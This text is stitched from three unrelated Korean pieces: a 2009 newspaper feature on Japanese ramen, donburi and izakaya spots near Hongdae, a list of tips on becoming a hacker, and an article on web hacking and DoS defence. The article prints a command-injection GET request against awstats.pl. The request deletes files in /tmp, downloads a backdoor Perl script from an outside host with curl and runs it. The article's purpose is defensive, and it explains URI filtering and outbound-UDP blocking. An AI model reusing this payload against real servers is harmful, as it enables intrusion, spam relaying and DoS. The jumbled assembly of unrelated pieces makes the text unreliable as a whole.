일간스포츠 원문 기사전송 2009-07-09 07:03 최종수정 2009-07-09 09:10

[JES 김현명] 까만 스모키 화장이 돋보이는 펑키스타일의 젊은이, 히라가나와 한자가 뒤엉킨 간판과 홍등, 쓸쓸한 벽면을 채운 화려한 그라피, ‘이랏샤이마세~!를 외치는 가게 점원. 일본의 하라주쿠 골목을 떠올리게 하지만 여기는 ‘홍대앞’이다. ‘라면’보다 ‘라멘’이, ‘주먹밥’보다 ‘오니기리’가, ‘덮밥’보다 ‘돈부리’라는 단어가 익숙한 거리. 요즘 홍대의 얼굴이다. 라멘 춘추전국시대 홍대에 불어온 ‘일본풍’의 한가운데엔 ‘일본라면전문점’이 있다. 2004년 ‘하카다분코’가 오픈했을 당시만 해도 사람들은, 느끼한 돼지뼈 국물에 말아낸 라면 앞에 손님들이 줄을 서는 ‘기현상’에 고개를 갸우뚱거렸다. 하지만 5년이 지난 지금, 나고미, 나가하마, 라멘81번옥, 멘야도쿄, 오네상라멘, 산쵸메 등 홍대주변에 오픈한 라멘전문점만 줄잡아 10여 군데가 넘는다. “요즘 홍대 젊은이들 사이에 ‘일본틱하다’는 말은 ‘스타일리시하다’, ‘트랜디하다’라는 말과 일맥상통합니다. 패션과 문화가 유행키워드로 떠오르다보니 음식도 자연스레 부각되는 거죠.” 라면전문점 ‘나고미’의 이광우 사장의 이야기다. 그렇다면 왜 하필 유독 ‘홍대앞’일까? 단순히 ‘홍익대생’만을 지칭하는 용어가 아닌 ‘홍대인’의 특성 때문이다. “홍대 앞은 여행이나 연수 등을 통해 다양한 외국문화를 경험해본 젊은이들이 많이 찾습니다. 특이한 것을 선호하고, 새로운 문화나 음식에 대한 거부감이 덜하기 때문에 많은 식당들이 홍대를 시작으로 외식 사업을 구상하게 되죠.” 잇쵸메의 안설희씨의 이야기다. 물론, 이들 중에는 유행에 편승해 무늬만 ‘일본식’이란 간판을 내건 곳도 있다. 하지만, ‘본토의 맛’에 뒤지지 않는다는 호평을 받는 곳도 있다. 지방에 거주하는 이들이나 미식동회에선 ‘해외여행’하듯, 주말엔 일정표까지 짜 미식투어를 온 경우도 있다. 한국인 입맛에 맞춰 독창적인 레시피를 선보이는 곳에서부터, 마니아층을 공략해 ‘본토식’만을 고집하는 곳까지 맛도 천차만별이고, 테이블 4-5개가 고작인 작은 가게에서부터 대형 프렌차이즈점까지 규모도 제각각이다. ■ 나고미 ‘하카다분코’와 함께 가장 ‘라멘’같은 라면을 만든다고 소문난 곳이다. 일본에 200여개의 매장을 둔 라면전문점 ‘야마고야’의 카미노 후쿠노리씨와 그에게 라면비법을 전수받은 이광우씨가 운영하고 있다. 돈코츠라면만 선보인다. 돼지사골을 최소 72시간 끓여 직접 육수를 우려내고 그에 맞는 면을 따로 만들어야하기 때문에 ‘미소라면’이나 ‘쇼유라면’등의 다른 메뉴는 할 여력이 없다는 것이 이사장의 설명이다. 2004년 요코하마 라면대회에서 3개 평가부문에서 1위를 했을 만큼 맛에 관한한 좋은 평가를 얻고 있지만, 일본라면을 처음 맛보는 이에겐 거북하게 느껴질 수도 있다. ‘일본 라멘초보자’를 봐주지 않는 ‘본토식 라멘’이지만, 한두 번 먹다보면 중독성이 있다. 돈코츠라면 6000원. 02-324-8545. ■ 잇쵸메 어설픈 장식 없이 입구에서부터 내부까지 가장 일본스러운 분위기를 낸다는 평을 얻고 있다. 돈코츠라멘을 기본으로 교자, 덮밥 등을 맛 볼 수 있다. 메뉴는 단출하지만, 소바처럼 국물에 찍어 먹는 ‘교토 냉라멘’(7000원) 등 국내에선 생소한 일본의 지역음식을 맛 볼 수 있다. 02-325-1369. 신흥세력가, 돈부리 삼파전 라멘전문점이 ‘일본풍’의 기득권세력이라면, 돈부리는 요즘 가장 떠오르는 신흥세력이다. 밥 위에 해산물, 닭고기 혹은 차슈 등을 얹어내는 돈부리는 우리의 ‘덮밥’과 비슷하다. 돈부리, 오자와, 코코로벤토가 가장 대표적인 맛집이다., 라멘집이나 일본식 돈가스 집에서도 슬그머니 ‘돈부리’메뉴를 선보이고 있을 만큼 돈부리에 대한 인기는 대단하다. “홍대에 모이는 젊은 사람들은 일본 여행 경험이 많은 편이예요. 아무래도 여행지에서 먹어본 익숙한 음식을 찾게 되는데 비교적 저렴하고 종류가 다양한 돈부리가 거기에 해당하는 거죠.” 돈부리의 이승화사장의 이야기다. 분식은 싫고, 그렇다고 고급 스시 집은 부담스러운 젊음세대들에게 ‘돈부리’는 싸고 맛있고 간편한 ‘이색 먹을거리’, 혹은 ‘고급 패스트푸드’로 통한다. ■ 돈부리 허리를 굽히고 들어 갈 수 있는 지하에다가 테이블도 몇 개 안되는 작은 가게라 기본 30분은 줄을 서야 맛 볼 수 있는 곳이다. 세 곳 중 가장 먼저 생겼고 만족도도 가장 높다. 여성들이 좋아할 만한 아기자기한 장식들로 가득한 인테리어, 다양한 메뉴 구성을 보이고 있다. 가츠동 6000원, 우나기동 8000원. 월요일은 휴무. 02-3141-8398. ■ 오자와 일본인이 운영하는 덮밥집이다. 돈부리 종류는 5가지다. ‘메뉴가 왜 이리 단출하냐; 물었더니 ‘다섯 개도 많다’고 한다. 가장 자신 있는 메뉴만 손님상에 내놓겠다는 자신감에서다. 가장 일본스러운 돈부리를 선보이기 위해 재료 구입차 한 달에 한 번씩 일본을 오간다는 고집 있는 사장이다. 오야꼬동 7000원, 가츠동 7000원, 가라아게동 7000원. 02-335-5551. ■ 코코로벤또 나머지 두 곳에 비해 가격적인 면, 음식 세팅 면에 있어서는 제일 ‘럭셔리’하다. 서비스도 섬세하다. 미식 블로거들 사이에 가장 포스팅 빈도가 높은 곳이긴 하지만 가격대비 맛의 만족도는 그리 높지 않다. 연어오야꼬동 1만3000원, 도리오야꼬동 9000원. 02-338-3822. 분위기에 취하는 일본, 이자카야 한 집 건너 이자카야라고 해도 좋을 만큼 홍대앞은 일본식 주점이 대세다. 홍대 앞 주점의 60~70%가 이자카야이거나 일본을 콘셉트로 하고 있다. 3개월 전 오픈한 긴죠우의 한지섭 사장은 “불과 3-4개월 사이 주변에 이자카야만 5군데가 넘게 문을 열었다‘며 이자카야 붐을 이야기했다. 대형 프랜차이즈 이자까야도 많이 있지만, 럭키식당, 와비사비 같이 골목에 숨어있는 소규모 사케 바를 찾아내는 재미가 더 쏠쏠하다. ■ 텟펜 일본에 본사를 둔 철판요리 전문점이다. 가게 문을 들어서는 순간, 모든 스텝들이 ‘일동경례’로 손님을 맞는다. ㄷ자형 바 테이블 안에서는 꽃미남 조리사들이 바지런한 손놀림으로 철판요리를 선보인다. 직원들의 절반 이상이 일본인이고, 수시로 외치는 ‘기합소리’또한 일본어라 옆자리에서 들려오는 익숙한 한국어만 아니라면, 일본에 온 듯 하다 착각을 불러일으킨다. 손님이 많이 몰릴 때는 1시간씩 줄을 서서 들어가기도 한다. 오코노미야끼 9500원, 향초구이 1만7000원 02-336-5578. ■ 도쿄 키친마루 요리가 주인공인 창작요리 주점이다. 일식조리법을 기본으로 한국의 식재를 이용해 창작요리를 선보인다. 츠지원 출신 조리사 외 6명의 젊은 일식 조리사들이 매일매일 새로운 메뉴를 올린다. 신선한 식재를 구하기 위해 수산물은 매일 수산시장에서 직접 장을 봐온다. 술에 취하기보다 맛에 취하고 분위기에 취하고 픈 여성들이 선호하는 곳이다. 02-325-4494. 그 외 인기 핫 스폿 ■ 교자전문점, 츠바사 찐 교자를 다시 한 번 구워서 내는 일본식 교자를 맛볼 수 있는 곳. 라면전문점 하카다분코를 꾸려나가던 세 명의 사장중 한명이 나와서 오픈한 고엔 교자의 2호점인 격. 기존의 교자메뉴에 매실교자, 커리교자 등을 추가했다. 차슈덥밥에 교자, 연두부가 세트로 나오는 곤타세트(7000원)도 새로 선보이는 메뉴다. 월요일은 정기휴일. 02-322-0205. ■ 오키나와식 요리, 비너스식당 일본의 대표적인 휴양섬인 오키나와 요리를 콘셉트로 한 곳. 미소라멘과 비슷한 육수에 칼국수 면처럼 납작한 면, 숙주, 차슈, 초생강을 곁들어 내는 오키나와 우동과 오키나와 명산물인 고야와 스팸, 두부, 계란들을 볶아서 만든 고야찬푸르등이 대표 메뉴다. 4층 건물 전체가 식당이라 대기 손님 눈치 보지 않고, 여유롭게 차까지 마시고 나올 수 있는 느긋함을 주는 곳. 02-336-5406. 글·사진=김현명 기자 [book88@joongang.co.kr]

호기심을 가지라
사물을 구분해서 그 내면을 본다. 시스템 디렉토리를 깊이 파고들어 그 안에 무엇이 있는지를 직접 두눈으로 본다. 파일을 Hex 에디터로 본다. 컴퓨터 안을 들여다본다. 컴퓨터 상점을 돌아다니면서 무엇이 있는지를 본다.

많이 읽어라.
여유가 있다면 책을 아주 많이 사라. 여유가 없으면 도서관의 책이나 인터넷상의 온라인북을 읽을것. 아니면 친구에게 책을 빌린다. 시스템의 Help 파일을 읽는다. 유닉스나 리눅스를 사용한다면 메인파일을 읽는다. 근처의 대학 도서관과 서점을 내집드나들듯이 드나들어라. 읽고 또 읽어라. 이해가 가지 않으면 읽고 또 읽어라. 이해가 갈때까지.

실습
바꾸는 것을 겁내지 마라. 일단 바꾸어보고 무슨일이 일어나나 보라. 물론 시스템을 통째로 날려버릴수도 있다. 그러나 이것이 해커가 되기위해 걸어야 하는 과정의 일부분이다. 이제껏 사용해본적 없는 생소한 command 옵션을 실행해보고 어떻게 되는지 본다. 프로그램의 옵션메뉴를 세밀히 관찰, 그 기능을 살핀다. 윈도우를 쓴다면 레지스트리를 건드려보고 어떻게 되나 본다. INI 파일 세팅을 바꾸어본다. 유닉스라면 평상시 잘 사용하지 않는 디렉토리를 파본다.

백업을 한다
시스템 파일들, 레지스트리, 패스워드 파일 등을 망쳐놓는다면 시스템이 날아가 곤경에 빠지게 될 것이다. 이 경우를 대비해 항상 백업을 떠놓는다. 여유만 있다면 실험용으로 시스템을 테스트하는 컴퓨터 한대를 마련해 그것으로 온갖 실험을 다 해본다.

컴퓨터로 한다.

자신에게 한계를 두지마라
컴퓨터나 네트워크만이 해킹하는 장소라고 누가 말했나? 전화는 어떻고? 텔레비전은 또 어떻고? (픽쳐튜브주위의 높은 전압을 조심할것. 인간후라이가 되어버린다면 내 책임이 아니다) 그리고 VCR. 프린터도. 방의 잠금장치도. 라디오의 원리도. 끊임없이 호기심을 갖고 공부하라.

진짜 툴을 얻으라
스크루드라이버로 판자를 자를수는 없다. 물론 못할거야 없겠지만 시간이 많이 걸린다. 지금 사용하고있는 운영체제에 맞는 툴을 열심히 찾아보아라. 인터넷상에 반드시 있다. 셰어웨어나 프리웨어로 구할 수 있는데 정말 좋은 툴은 돈을 주고 사야하는 경우가 많다. 어떤 툴이냐고? Hex 파일 에디터. 시스템 메세지와 네트워크 트래픽을 분석하는 스누퍼, 프로그래밍툴, 스크립팅툴, 디스트 에디터/포매터, 디셈블러 등이다. 좋은 것을 구하면 스스로 써보라.

프로그래밍을 배우라
해커가 되고싶다면 프로그래밍을 배워야한다. 어떤 프로그램을 배우느냐는 어떤 운영체제를 쓰느냐에 달렸다. 유닉스를 사용한다면 Perl을 배우기를 권한다. camel book의 Programming Perl과llama book 의 Learning Perl Perl 책을 사서 읽어보라. 모든 기초가 아주 쉽게 나와있을 것이다. 윈도우 사용자라면 비주얼 베이직이나 델파이를 배울것. 어떤 운영체제를 사용하든 진짜 해커가 되고싶다면 C언어를 배워야 한다. 진짜 해커는 한가지 이상의 프로그래밍언어를 알아야 한다.

타이핑을 배우라
해커들은 많은 시간을 키보드와 함께 보낸다. 몇분의 몇초라도 타이핑을 더 빨리 하는 것이 얼마나 득이 되는가는 아는 사람은 다 안다. 타이핑 버릇이 나쁜 사람은 몇달이 걸려도 좋으니 처음부터 시작해 타이핑을 완벽하게 열손가락을 다 사용해 할 수 있도록 익힌다.

진짜 운영체제를 사용하라
요즘은 누구나 윈도우 95/98을 사용한다. 윈도우는 진짜 운영체제가 아니다. 리눅스, 윈도우 NT, Mac, OS/2 ... 등이 진짜 운영체제이다. 진짜 운영체제를 깔고 완전히 익숙해질때까지 공부하라. 한가지 프로그래밍 언어만 아는 것으로 진짜 해커가 될수 없듯이 한가지 운영체제만 알아서는 해커가 될 수 없다. 리눅스는 모든 해커의 꿈이다. 리눅스를 가지고 놀것. 공개된 소스코드를 분석하고 연구한다. 리눅스를 스스로 개발할 수 있을때까지. 누가 알랴. 내가 사용하는 나만의 운영체제를 스스로 만들수 있게될지.

사람들과 말하라
진공상태에서 배우기란 어렵다. 수업을 듣는다. 사용자 그룹이나 컴퓨터 클럽에 가입한다. IRC, 뉴스그룹, 웹게시판에서 만나는 사람들과 대화를 나눈다. 그중에는 반드시 내 스승이 되어줄 사람이 있다. 그런 사람을 찾는데 시간이 좀 걸리겠지만. 그렇다고 해킹하는 법을 가르쳐달라고는 하지 말것. 가장 좋은 방법은 주고받는 것이다. 상대가 나에게 무엇을 주기를 원한다면 내가 먼제 그에게 주는 것이다. 내가 알고있는 것을 나누어주면 상대도 내게 나누어줄것이다.

프로젝트를 만든다
프로젝트 하나를 만들어 그것이 끝날때까지 몰두하는 것이 중요하다. 직접 해야 배우게 된다. 잘 모르더라도 일단 시작해 처음부터 끝까지 차근차근 하다보면 모든것을 속속들이 이해하게 된다. 아이콘을 만드는 것 등등 정말로 간단한 것으로 시작한다. 윈도우에서 스타트업 화면을 바꾸는 이나 유닉스의 프롬프트 등을 바꾸는 등. 그리고 나서 일반적인 기능을 하는 스크립트를 만들고, 파일을 감출수 있는 프로그램도 제작해 본다.

인터넷을 사용하는 법을 배우라
해킹에 관한한 모든 정보는 인터넷상에서 얻을 수 있다. 서치엔진사용법, boolean을 익히고, 유용한 페이지는 북마크를 해둔 후, 유즈넷, 고퍼, IRC등 모든 곳을 드나들어 본다. 정말로 필요한 정보는 의외로 희안한 곳에 있게 마련이다.

최근 웹 애플리케이션의 취약성을 이용한 웹 해킹이 기승을 부리고 있다.
다음은 대표적인 웹 로그 분석 프로그램인 'awstats'의 취약성을 이용한 공격 사례다. 

이는 GET 메소드로 해당 사이트에 특정 옵션을 주면 바로 시스템 명령어를 실행할 수 있다는 점을 이용한 것으로, 먼저 /tmp 디렉토리로 이동한 뒤 특정 사이트에서 백도어 파일을 다운로드하고 perl을 실행한다는 것을 알 수 있다. 이 때 awstats.pl에 SUID(Set User ID) 가 설정되지 않으면 웹 서버 권한으로 실행돼 nobody로 작동할 것이다.
 

GET
http://www.domain.com/awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;curl%20-O%20http://www.geocities.com/h4x000r/a.pl;perl%20a.pl;echo%
20;rm%20-rf%20a.pl*;echo| HTTP/1.1

이상과 같은 웹 해킹 후에는 몇 가지 뚜렷한 현상이 나타나는데, 우선 스팸이나, 피싱 등 대량의 스팸 메일을 발송하는 경우다. 릴레이가 허용된 메일 서버가 많이 사라지고 각종 안티 스팸 정책들이 설정되면서 스패머들이 설 자리가 없어지다 보니 자연스럽게 해킹을 통해 스팸을 발송하는 경우가 증가하고 있다. 스패머들은 웹 해킹으로 nobody 등 웹 서버 실행 권한을 획득한 후 wget이나 curl, lynx 등의 시스템 명령어를 통해 서버에 메일 발송 프로그램 등 각종 백도어 파일을 다운로드하고 실행한다. 이로 인해 시스템에 과부하가 일어나 정상적으로 운영되던 서버가 하루 아침에 각종 RBL에 스팸 발송 리스트에 등록되는 경우가 생긴다.

자신의 서버가 RBL에 등록됐는지 여부는 다음의 질문을 통해 확인하면 된다.

http://www.dnsstuff.com/tools/ip4r.ch?ip=211.47.xx.xxx

다음은 PS를 사용할 경우 실제 스팸을 발송할 때 보이는 관련 프로세스로, 웹 서버 실행 권한인 nobody를 통해 perl을 이용해 메일을 발송하고 있음을 알 수 있다.

nobody   25619  0.0  0.0   02:14   0:00 sh -c perl sendeb.pl

두 번째는 일종의 DoS 공격인 UDP 플루딩 공격을 하는 경우다. TCP나 ICMP보다 UDP를 이용할 경우 보다 효과적이기 때문에 거의 대부분 UDP를 사용하게 된다.

이 역시 nobody 권한을 획득 후 wget 등으로 대량의 패킷을 생성할 수 있는 공격 파일을 다운로드 해 특정 네트워크나 서버로 공격하는 것이다. 이런 경우 대량의 패킷 트래픽을 유발해 네트워크 장비가 패킷 전송을 제대로 하지 못해 up&down을 반복하면서 네트워크 장애가 발생한다. 물론 일부 공격 형태에 따라서는 bps(bits per second)가 동반 상승하는 경우도 있지만, bps보다는 pps가 더욱 중요하다.

실제 테스트를 해 보면 특정 코드의 경우 10만 pps 이상 유발되며, 이 정도면 저사양 라우터 등 3계층 이상 장비들(4계층 스위치, 파이어월, 7계층 장비 등)은 최대 용량 초과로 다운된다. 네트워크 장비의 경우 pps는 SNMP를 이용한 MRTG로, 리눅스의 경우 IPtraf를 이용하면 즉시 측정할 수 있다.
(화면 3)는 MRTG로 pps를 측정한 것인데, 오전 4시경부터 평소의 1만 pps에서 96만 pps까지 상승한 것을 알 수 있다.  

 
화면 3 | MRTG로 측정한 pps

IPtraf는 홈페이지(http://iptraf.seul.org)에서 다운로드할 수 있으며, 프로그램을 실행한 뒤 'Detailed interface statistics'를 선택해 측정할 인터페이스를 선정하면 해당 인터페이스를 통과하는 패킷의 bps와 pps를 실시간으로 확인할 수 있다. 다음은 실제 대량의 pps를 유발하는 DoS 공격툴을 실행할 때 캡처된 수치로, 단방향으로 10만 pps 이상의 프래픽이 유발되는 것을 알 수 있다. 

화면 4 | IPtraf를 실행하여 pps를 모니터링 하는 화면

최근 들어 곳곳에서 확인되는 위협적인 Dos 공격에 어떻게 대응해야 할까. 다음과 같은 방법을 그 해결책으로 꼽을 수 있다.

① wget, curl, lynx 등의 퍼미션을 700 등으로 제한하거나 삭제한다.
앞에서도 살펴본 바와 같이 취약성을 통해 시스템 명령어를 실행할 수 있는 상태가 되면 상위 권한 획득, 스팸 메일 발송 등을 위해 외부에서 다운로드를 위한 wget이나 curl,  lynx 등을 이용한다. 따라서 이 파일의 퍼미션을 차단하면 일반 사용자 권한으로 외부에서 악성코드의 다운로드가 어려워진다. 물론 wget 등을 차단해도 ftp를 이용하거나 게시판을 통한 파일 업로드 등을 이용할 수 있다.

② 웹 서버에서 특정 URI를 필터링하도록 한다.
앞에서 awstats의 공격 사례를 살펴본 것처럼 HTTP의 GET 메소드를 통해 공격할 경우 URI에 시스템 명령어 등 각종 공격 기법이 그대로 노출된다. 따라서 URI에 보이는 명령어를 필터링하면 되는데, 아파치 웹 서버의 경우 자체적으로 URI 필터링 기능을 제공하지 않으므로 별도의 Rewrite나 ModSecurity 모듈을 이용한다.

③ IPtables를 이용해 패킷을 차단한다.
아웃바운드 UDP 트래픽이 문제가 되는 것이므로 IPtables를 이용해 차단하는 방법도 고려할 수 있다. 상태 추적을 이용하면 해당 트래픽만 차단할 수 있는데, 일반적으로 정상적인 UDP 트래픽은 DNS 외에는 없으므로 DNS만 고려해 실행하면 된다.

다음은 아웃바운드 트래픽 중 목적지 IP가 168.126.63.1이면서 목적지 포트가 53번이 아닌 UDP 트래픽을 차단하는 과정이다. 만약 참조하는 DNS 서버가 168.126.63.1이 아니면 적절한 IP를 지정하면 된다.
  
   # iptables -A OUTPUT -p udp ! -d 168.126.63.1 --dport 53
        -m state --state NEW -j DROP

이 명령어는 상태추적에서 처음 보이는 아웃바운드 UDP 트래픽 중 목적지 IP가  168.126.63.1이고, 목적지 포트가 53번인 패킷은 제외하고 차단한다는 것이다. 만약 자체적으로 resolvong DNS 서버를 운영해 임의의 도메인에 대한 룩업 서비스를 제공한다면 모든 DNS 서버로 질의를 할 수 있다. 이 경우에는 목적지 IP를 0/0으로 변경하면 된다.

최근 해킹 양상이 단순한 흥미와 영웅심리가 아닌 상업적으로 악용되면서 두 번째 Dos 공격의 경우가 자주 확인되고 있으므로, 궁극적으로는 일반 사용자 권한을 빼앗기지 않도록 보안을 강화하는 것이 더욱 중요할 것이다.

저자 : 홍석범 | 오늘과내일 운영관리팀 차장

원문 : http://www.ionthenet.co.kr/newspaper/view.php?idx=10788

출처 : On the NET(http://www.ionethenet.co.kr)